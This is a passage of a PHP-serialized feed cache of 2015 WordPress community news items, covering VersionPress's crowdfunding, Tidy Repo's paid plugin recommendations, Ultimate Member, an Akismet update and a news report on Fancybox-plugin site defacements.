+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: An Inside Look at VersionPress’ Crowdfunding Campaign\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40758\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://wptavern.com/an-inside-look-at-versionpress-crowdfunding-campaign\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4416:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/06/VersionPressFeaturedImage.png\" rel=\"prettyphoto[40758]\"><img class=\"size-full wp-image-24643\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/06/VersionPressFeaturedImage.png?resize=650%2C200\" alt=\"Version Control Featured Image\" /></a>Version Control Featured Image\n<p>When <a title=\"http://wptavern.com/versionpress-misses-crowdfunding-goal-by-14-5k\" href=\"http://wptavern.com/versionpress-misses-crowdfunding-goal-by-14-5k\">VersionPress missed its crowdfunding goal</a> by raising only 45% of $30K, I cited several contributing factors, including lack of trust, licensing confusion, and the campaign’s short length. The lead developer of VersionPress, Borek Bernard, shared the <a title=\"http://blog.versionpress.net/2015/03/crowdfunding-campaign-lessons-learned/\" href=\"http://blog.versionpress.net/2015/03/crowdfunding-campaign-lessons-learned/\">lessons he learned</a> from running the campaign on the company’s blog.</p>\n<p>Bernard explains that despite the campaign being a single page site, a lot of work went into it:</p>\n<blockquote><p>In our case, the website took over 250 commits and hundreds of hours to get prepared. And it was a seemingly simple, single-page site! This was partly related to the fact that the campaign was self-hosted, but still, some tasks just can’t be skipped. For example, writing copy alone is a huge task should it be any good and easily takes weeks of effort. There are more things like that so be prepared to spend considerable amount of time and effort on the campaign page.</p></blockquote>\n<p>After I <a title=\"http://wptavern.com/versionpress-hopes-to-bring-version-control-to-the-masses\" href=\"http://wptavern.com/versionpress-hopes-to-bring-version-control-to-the-masses\">introduced readers to the VersionPress project,</a> several people <a title=\"http://wptavern.com/versionpress-hopes-to-bring-version-control-to-the-masses#comments\" href=\"http://wptavern.com/versionpress-hopes-to-bring-version-control-to-the-masses#comments\">voiced their concern</a> over the lack of licensing details. I got in touch with Bernard and explained why so many people were concerned. I explained what the GPL means to the project and the WordPress community in general. I cited examples of successful WordPress product businesses that use the license. I also told him that he’s likely receive more financial support by being 100% GPL.</p>\n<p>Although it took a few days, <a title=\"http://wptavern.com/versionpress-adopts-the-gpl-software-license\" href=\"http://wptavern.com/versionpress-adopts-the-gpl-software-license\">Bernard announced</a> VersionPress would be 100% GPL licensed. According to Bernard, the announcement didn’t translate into more backers.</p>\n<blockquote><p>By the way, it was interesting to see what the GPL announcement did to the actual contributions. We were told how the GPL was important and that it would bring us many more supporters, but in actuality, it didn’t have any measurable effect. During the whole campaign, the only factor that strongly correlated with the contributed sum was the number of visitors on the versionpress.net website.</p></blockquote>\n<p>It’s not clear why adopting the GPL license didn’t have an effect on the number of backers. However, I think that being licensed 100% GPL eliminates potential roadblocks that may have resulted in using a license not compatible with the GPL.</p>\n<p>One of the lessons I learned from VersionsPress’ campaign is that despite not reaching its goal, the amount of feedback from media coverage and backers was enough to verify the idea. The team continues to move forward with development and is <a title=\"http://blog.versionpress.net/2015/02/1-0-rc2-released/\" href=\"http://blog.versionpress.net/2015/02/1-0-rc2-released/\">nearing a 1.0 release</a>.</p>\n<p>If you’re thinking about launching a crowdfunding campaign, I highly recommend listening to <a title=\"http://wptavern.com/wpweekly-episode-156-a-crowdfunding-roundtable\" href=\"http://wptavern.com/wpweekly-episode-156-a-crowdfunding-roundtable\">episode 156 of WordPress Weekly</a> where Marcus Couch and I interview Scott Kingsley Clark, John Saddington, and Nick Haskins. All three describe their experience managing a crowdfunding campaign and share important tips and lessons to help reach funding goals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 Mar 2015 21:56:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Tidy Repo Launches WordPress Plugin Recommendation Service\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40715\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wptavern.com/tidy-repo-launches-wordpress-plugin-recommendation-service\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4633:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/coffee-laptop.jpg\" rel=\"prettyphoto[40715]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/coffee-laptop.jpg?resize=1025%2C505\" alt=\"coffee-laptop\" class=\"aligncenter size-full wp-image-40753\" /></a></p>\n<p><a href=\"http://tidyrepo.com/\" target=\"_blank\">Tidy Repo</a> has been pumping out WordPress plugin reviews since 2013. Today co-owners <a href=\"https://twitter.com/jay_hoffmann\" target=\"_blank\">Jay Hoffman</a> and and <a href=\"https://twitter.com/jackmcconnell\" target=\"_blank\">Jack McConnell</a> are branching out to launch a new service that helps customers find a plugin for a $35 fee.</p>\n<p>The Tidy Repo <a href=\"http://tidyrepo.com/find-plugin-service/\" target=\"_blank\">plugin recommendation service</a> is the first of its kind. With more than 36,000 plugins listed in the WordPress.org directory, and thousands more hosted elsewhere, WordPress users can get overwhelmed when trying to pinpoint the right plugin to solve a problem. Without experience or WordPress development knowledge, the process boils down to trial and error.</p>\n<p>Tidy Repo is aiming to eliminate the need for exhaustive research. After testing thousands of plugins, with 250+ published reviews, Hoffman and McConnell believe they can save customers quite a bit of time in selecting the perfect plugin. Both are developers who have written plugins and worked with WordPress for years.</p>\n<p>“I have a good sense of where conflicts can come up and what is potentially harmful,” Hoffman said. “It does become a lot of intuition too. Anyone on the WP Plugin Review team, or the great plugin developers I know, can kind of feel through things and you start being able to spot the weak points very quickly- be that with a conflict in the code, or just a problem with its general user experience.”</p>\n<p>Hoffman has a range of criteria that he measures a plugin’s code against before recommending it to a customer:</p>\n<blockquote><p>The most important thing to me is that a plugin makes proper use of the WordPress API. If a plugin sticks to WordPress functions and hooks, that can get us a lot of the way there. It at least goes a long way in ensuring that a plugin won’t bump up against other plugins or themes. </p>\n<p>I’m also looking to make sure that if a plugin is adding something to the front-end, it is doing so in a performant way. Is it minifying CSS / JS files? Taking steps to only include external files on pages where they are necessary? You sometimes hear people complain that WordPress is slow, and I think poor front-end performance in a plugin is often the culprit. </p>\n<p>Code structure also comes into play a bit, but only as it relates to actual function. What I mean is that I don’t necessarily have a preference for structure, as long as it remains consistent. That’s just a sign of a good developer.</p></blockquote>\n<p>The basic plugin recommendation package comes with a full report, including the environment it was tested in, and a few secondary recommendations (if warranted). Additional services, such as multiple recommendations, installation, and video walkthroughs can be added to the basic package.</p>\n<p>Hoffman and McConnell hope to grow the database of Tidy Repo reviews alongside the new plugin recommendation service, but neither constitute a full-time endeavor at the moment.</p>\n<p>“It’s been a labor of love from the beginning, and this is the first time that we’re offering a premium service to our readers,” Hoffman said. “Jack and I have a ton of ideas for making the plugin discovery process a lot easier, like more elegant faceted search, in-depth guides, and a ton more, but it’s incredibly difficult to do on top of everything else that life demands.</p>\n<p>“To be frank, this is a total experiment for me. There are times when it is incredibly difficult to keep Tidy Repo going, but enough people appear to find it useful that I want to keep it around. Maybe that’s just a long way of saying Tidy Repo would be a dream full-time gig for me, if I ever had the opportunity to do so,” he said.</p>\n<p>It’s not uncommon for those who have created a helpful tool or community resource, such as <a href=\"http://tidyrepo.com/\" target=\"_blank\">Tidy Repo</a> or <a href=\"http://generatewp.com/\" target=\"_blank\">GenerateWP</a>, to try to find a way to monetize their efforts. Is there a market for the Tidy Repo co-owners’ experiment? Or will WordPress users continue to stumble on the best plugins through trial and error?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 Mar 2015 21:25:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Remote Work Popularity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44796\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://ma.tt/2015/03/remote-work-popularity/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:145:\"<p>Scott Berkun asks <cite><a href=\"http://scottberkun.com/2015/why-isnt-remote-work-more-popular/\">Why Isn’t Remote Work More Popular?</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 Mar 2015 21:17:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Akismet: Akismet WordPress Plugin 3.1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=1797\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://blog.akismet.com/2015/03/17/akismet-3-1-1-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:938:\"<p>Version 3.1.1 of <a href=\"http://wordpress.org/plugins/akismet/\">the Akismet plugin for WordPress</a> is now available.</p>\n<p>This update includes an improvement to the “Remove comment author URL” feature and merges the pingback DDOS protection from Akismet 2.x into the 3.x plugin line.</p>\n<p>To upgrade, visit the Updates page of your WordPress dashboard and follow the instructions. If you need to download the plugin zip file directly, links to all versions are available in <a href=\"http://wordpress.org/plugins/akismet/\">the WordPress plugins directory</a>.</p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/akismet.wordpress.com/1797/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/akismet.wordpress.com/1797/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.akismet.com&blog=116920&post=1797&subd=akismet&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 Mar 2015 20:00:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Christopher Finke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: Hackers Hijack Fancybox Plugin to Deface WordPress Sites with ISIS Propaganda\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40719\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3485:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/isis-hack.png\" rel=\"prettyphoto[40719]\"><img class=\"aligncenter size-full wp-image-40730\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/isis-hack.png?resize=945%2C552\" alt=\"isis-hack\" /></a></p>\n<p>Last month a vulnerability was discovered in the <a href=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\" target=\"_blank\">Fancybox for WordPress</a> plugin, making it possible for a hacker to inject an iframe into the website without needing administrator access. Although the issue was promptly patched, a string of seemingly random WordPress websites were recently compromised using this vulnerability.</p>\n<p>Hackers claiming to be acting on behalf of ISIS exploited Fancybox to deface the websites with propaganda for the terrorist group. <a href=\"http://www.cujournal.com/news/isis-update-hacking-of-montana-cu-provides-vital-lesson-to-community-1024100-1.html\" target=\"_blank\">Credit Union Journal</a> reports that a Montana credit union website was attacked using the Fancybox plugin as the entry point.</p>\n<p><a href=\"http://area43.net/2015/03/isis-vs-nascar-the-tech-behind-the-hacking-of-eldoraspeedway-com/\" target=\"_blank\">Area43.net</a> examined the cached Google source code for several other hacked sites and reported that both <a href=\"http://Eldoraspeedway.com\" target=\"_blank\">Eldoraspeedway.com</a> and <a href=\"http://Montgomeryinn.com\" target=\"_blank\">Montgomeryinn.com</a> have since removed the Fancybox for WordPress plugin.</p>\n<p>In order to deface the websites, the suspected ISIS hackers likely scanned for sites that have not updated the Fancybox for WordPress plugin, as the sites bear no other commonalities apart from using WordPress. Many <a href=\"http://www.independent.ie/irish-news/dublin-rape-crisis-center-website-hacked-by-isis-31051435.html\" target=\"_blank\">major</a> <a href=\"http://www.newsweek.com/isis-hacker-targets-websites-folk-singer-hotels-nascar-driver-312636\" target=\"_blank\">news</a> <a href=\"http://www.nbcnews.com/news/us-news/isis-hackers-almost-certainly-not-isis-hackers-n320296\" target=\"_blank\">outlets</a> with no understanding of WordPress’ plugin system have wrongly attributed the security flaw to WordPress itself.</p>\n<p><a href=\"https://wordpress.org/plugins/fancybox-for-wordpress/\" target=\"_blank\">Fancybox for WordPress</a> is currently active on more than 100,000 sites, but stats on WordPress.org do not break down how many of those are using a version older than the patched update issued in February. According to Samuel “Otto” Wood, WordPress.org pushed out a forced update for the Fancybox plugin vulnerability, although it wasn’t widely reported.</p>\n<p>What is it going to take for WordPress site administrators to keep their plugins updated? If you’re not comfortable updating WordPress plugins yourself, then you need to be on a maintenance plan with a development company to keep your software updated and secure.</p>\n<p>While many developers are not too keen on the possibility of WordPress someday <a href=\"http://wptavern.com/its-time-for-wordpress-to-automatically-update-themes-plugins-and-core-by-default\" target=\"_blank\">adopting automatic updates for core, plugins, and themes by default</a>, your average website owner would probably prefer it over would-be ISIS hackers exploiting the simplest of vulnerabilities to deface their websites.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 Mar 2015 17:02:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Matt: Meetups Around the World\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44783\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"http://ma.tt/2015/03/meetups-around-the-world/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:337:\"<p><a href=\"https://kinsta.com/learn/wordpress-communities-around-the-world/\">Here’s a great article about WordPress meetup communities around the world</a>, including Singapore, Argentina, France, Croatia, India, Serbia, Malta, Norway, South Africa, Canada, Switzerland, Ireland, Estonia, Egypt, Poland, Belgium, and Slovakia.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 Mar 2015 05:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WPTavern: Ultimate Member: A New Free Community and User Profile Plugin for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40639\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/ultimate-member-a-new-free-community-and-user-profile-plugin-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5310:\"<p><a href=\"https://ultimatemember.com/\" target=\"_blank\">Ultimate Member</a> is the newest plugin to join the ranks of WordPress membership solutions after seven months in development. One month after landing in the WordPress.org directory, the <a href=\"https://wordpress.org/plugins/ultimate-member/\" target=\"_blank\">plugin</a> is already active on more than 2,000 WordPress sites and has received a 5-star rating from 73/75 reviewers.</p>\n<p>The WordPress ecosystem is flush with both free and commercial membership plugins, but Ultimate Member takes a unique approach with its heavy emphasis on frontend community features. The plugin goes beyond content restriction to provide beautifully-designed user profiles and directories out of the box.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/ultimate-member.png\" rel=\"prettyphoto[40639]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/ultimate-member.png?resize=949%2C457\" alt=\"ultimate-member\" class=\"aligncenter size-full wp-image-40641\" /></a></p>\n<p>It includes searchable member directories and frontend user registration, login, and profiles. Administrators can create custom form fields with conditional logic. The membership features include custom user roles, content restriction, conditional menus, and more. Ultimate Member is compatible with multisite and Mandrill. It was also designed to be developer friendly with dozens of actions and filters for further customization.</p>\n<p><a href=\"http://ultimatememberdemo.com/\" target=\"_blank\">Live demos</a> are available for the user profiles, member directory, and user account pages.</p>\n<h3>Ultimate Member Extensions Sales Hit $1500 in the First 5 Days</h3>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/ultimate-member-extensions.jpg\" rel=\"prettyphoto[40639]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/ultimate-member-extensions.jpg?resize=1019%2C174\" alt=\"ultimate-member-extensions\" class=\"aligncenter size-full wp-image-40701\" /></a></p>\n<p>Co-founders <a href=\"https://twitter.com/calumallison\" target=\"_blank\">Calum Allison</a> and Ahmed Elmahd opted to keep the base plugin free and offer additional commercial <a href=\"https://ultimatemember.com/extensions/\" target=\"_blank\">extensions</a>.</p>\n<p>“We decided to use the free core + paid extensions model as we’ve seen how successful plugins such as WooCommerce, Ninja Forms, and Easy Digital Downloads have been with this model,” Allison said. “We want to try replicate this success in the community/user space.”</p>\n<p>Initial extension sales indicate that the team has identified a competitive niche. “We’ve had sales of just under $1,500 from our first five days and we hope this will grow as more extensions are built and more people learn about the plugin,” Allison told the Tavern.</p>\n<p>Ultimate Member is not quite a BuddyPress alternative, but its founding duo entered the market to provide basic social features on top of membership functionality.</p>\n<p>“The plugin is useful for people looking to build a site where users can sign up and become members but are not necessarily looking to create a full-blown social network which is offered by plugins such as BuddyPress or WP Symposium,” Allison said.</p>\n<p>Currently, the most popular extensions in terms of sales are the bbPress integration and Social Login extensions. More modular social features, such as private messaging and paid membership upgrades, are currently in the works.</p>\n<p>“Longer term we are considering building themes which are designed specifically for the community niche,” Allison said.</p>\n<p>In the meantime, the duo is focusing on providing support for all users and have answered more than 400 topics on their community forum and the WordPress.org plugin support forum.</p>\n<p>“We made a decision from the beginning that we would provide support for all users of the plugin, regardless of whether they purchased an extension or not,” Allison said. “We feel that providing at least some support to free users means they are more likely to want to purchase an extension or two.”</p>\n<p>Ultimate Member is open source and available on <a href=\"https://github.com/ultimatemember/ultimatemember\" target=\"_blank\">GitHub</a> for contribution from developers. Co-founders Allison and Elmahd also maintain a <a href=\"https://trello.com/b/30quaczv/ultimate-member\" target=\"_blank\">Trello board</a> for mapping the future of the plugin and managing current issues.</p>\n<p>With a strong set of <a href=\"https://ultimatemember.com/features/\" target=\"_blank\">core features</a> and solid extensions sales numbers right out of the gate, <a href=\"https://ultimatemember.com/\" target=\"_blank\">Ultimate Member</a> is already demonstrating success with the free core plus commercial extensions business model. Even in a seemingly saturated WordPress membership plugin market, a quality product that can zero in on a specific niche has a decent chance of becoming competitive within a short time after launching. The challenge will be keeping up with the level of support they intend to offer for both commercial and free users, while growing the library of extensions.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 Mar 2015 22:55:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Pods Framework Security Release Fixes Severe 